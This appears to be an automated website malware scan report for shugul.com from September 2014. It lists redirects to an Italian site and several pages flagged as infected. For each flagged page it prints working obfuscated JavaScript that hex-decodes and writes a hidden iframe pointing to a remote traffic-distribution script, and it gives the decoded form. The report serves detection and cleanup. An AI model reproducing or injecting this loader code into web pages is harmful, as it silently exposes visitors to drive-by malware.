Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.shugul.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.shugul.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 28 Sep 2014 05:36:24 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.shugul.com/ | 200 OK Content-Length: 25942 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/js/main.js | 200 OK Content-Length: 14232 Content-Type: application/x-javascript | clean |
http://www.shugul.com/js/noclick.js | 200 OK Content-Length: 624 Content-Type: application/x-javascript | clean |
http://www.shugul.com/company/index.html | 200 OK Content-Length: 10185 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859fef0a50c(v51859fef0a554){ function v51859fef0a598 () {return 16;} return(parseInt(v51859fef0a554,v51859fef0a598()));}function v51859fef0a651(v51859fef0a695){ function v51859fef0a771 () {var v51859fef0a7b1=2; return v51859fef0a7b1;} var v51859fef0a6dc='';for(v51859fef0a727=0; v51859fef0a727<v51859fef0a695.length; v51859fef0a727+=v51859fef0a771()){ v51859fef0a6dc+=(String.fromCharCode(v51859fef0a50c(v51859fef0a695.substr(v51859fef0a727, v51859fef0a771()))));}return v51859fef0a6dc;} document.write(v51859fef0a651('3C696672616D65206E616D653D27623362303427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3331206865696768743D3930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='b3b04' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=31 height=90 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/company/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:26 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://padovarisorse.it/mambots/search/search.php | 200 OK Content-Length: 186 Content-Type: text/html | clean |
http://padovarisorse.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163644 Content-Type: application/x-javascript | clean |
http://www.shugul.com/company/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:27 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/portfolio/index.html | 200 OK Content-Length: 11843 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ffa2dd08(v51859ffa2dd5a){ function v51859ffa2dd97 () {var v51859ffa2dde5=16; return v51859ffa2dde5;} return(parseInt(v51859ffa2dd5a,v51859ffa2dd97()));}function v51859ffa2de7b(v51859ffa2dec9){ var v51859ffa2dfb8=2; var v51859ffa2df17='';for(v51859ffa2df69=0; v51859ffa2df69<v51859ffa2dec9.length; v51859ffa2df69+=v51859ffa2dfb8){ v51859ffa2df17+=(String.fromCharCode(v51859ffa2dd08(v51859ffa2dec9.substr(v51859ffa2df69, v51859ffa2dfb8))));}return v51859ffa2df17;} document.write(v51859ffa2de7b('3C696672616D65206E616D653D2738333533393427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353034206865696768743D353034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='835394' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=504 height=504 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/portfolio/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/portfolio/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/about.html | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/services/index.html | 200 OK Content-Length: 21109 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ffd1584e(v51859ffd15893){ var v51859ffd1592e=16; return(parseInt(v51859ffd15893,v51859ffd1592e));}function v51859ffd159e8(v51859ffd15a4b){ var v51859ffd15c82=2; var v51859ffd15a9a='';for(v51859ffd15b26=0; v51859ffd15b26<v51859ffd15a4b.length; v51859ffd15b26+=v51859ffd15c82){ v51859ffd15a9a+=(String.fromCharCode(v51859ffd1584e(v51859ffd15a4b.substr(v51859ffd15b26, v51859ffd15c82))));}return v51859ffd15a9a;} document.write(v51859ffd159e8('3C696672616D65206E616D653D2761626433333230323733366127207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353931206865696768743D3230207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='abd33202736a' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=591 height=20 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/services/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/services/../js/dhtmlwindow.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/services/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/whitepapers/index.html | 200 OK Content-Length: 14369 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865da38fafd(v51865da38fb47){ var v51865da38fb8e=16; return(parseInt(v51865da38fb47,v51865da38fb8e));}function v51865da38fc15(v51865da38fc56){ var v51865da38fc98='';for(v51865da38fcd9=0; v51865da38fcd9<v51865da38fc56.length; v51865da38fcd9+=2){ v51865da38fc98+=(String.fromCharCode(v51865da38fafd(v51865da38fc56.substr(v51865da38fcd9, 2))));}return v51865da38fc98;} document.write(v51865da38fc15('3C696672616D65206E616D653D27386332306327207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353536206865696768743D3237207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='8c20c' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=556 height=27 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/whitepapers/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/whitepapers/../js/dhtmlwindow.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/whitepapers/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/newsletter/index.html | 200 OK Content-Length: 13473 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ff699a30(v51859ff699a70){ var v51859ff699ab3=16; return(parseInt(v51859ff699a70,v51859ff699ab3));}function v51859ff699b59(v51859ff699b99){ function v51859ff699c57 () {return 2;} var v51859ff699bd8='';for(v51859ff699c16=0; v51859ff699c16<v51859ff699b99.length; v51859ff699c16+=v51859ff699c57()){ v51859ff699bd8+=(String.fromCharCode(v51859ff699a30(v51859ff699b99.substr(v51859ff699c16, v51859ff699c57()))));}return v51859ff699bd8;} document.write(v51859ff699b59('3C696672616D65206E616D653D27623227207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3639206865696768743D333134207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='b2' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=69 height=314 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/newsletter/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/newsletter/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/forward/index.html | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/choice.html | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/tools/index.html | 200 OK Content-Length: 14034 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865d9fd92a0(v51865d9fd92f4){ return(parseInt(v51865d9fd92f4,16));}function v51865d9fd9428(v51865d9fd946c){ var v51865d9fd953a=2; var v51865d9fd94b2='';for(v51865d9fd94f5=0; v51865d9fd94f5<v51865d9fd946c.length; v51865d9fd94f5+=v51865d9fd953a){ v51865d9fd94b2+=(String.fromCharCode(v51865d9fd92a0(v51865d9fd946c.substr(v51865d9fd94f5, v51865d9fd953a))));}return v51865d9fd94b2;} document.write(v51865d9fd9428('3C696672616D65206E616D653D2733623627207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3534206865696768743D333033207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='3b6' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=54 height=303 style='display:none'></iframe> Antivirus reports:
http://www.shugul.com/tools/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/tools/../js/dhtmlwindow.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2.asp?partner=netweather&tStyle=normal&logo=1&zipcode=AFR|SD|SU005|KHARTOUM|&lang=uke&size=9&theme=&metric=1&target=_self | 200 OK Content-Length: 8331 Content-Type: text/javascript | clean |
http://www.shugul.com/tools/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:31 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/contacts.html | 200 OK Content-Length: 11644 Content-Type: text/html | clean |
http://www.shugul.com/index.html | 200 OK Content-Length: 25942 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe> Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shugul.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shugul.com/
Result: shugul.com is not infected or malware details are not published yet.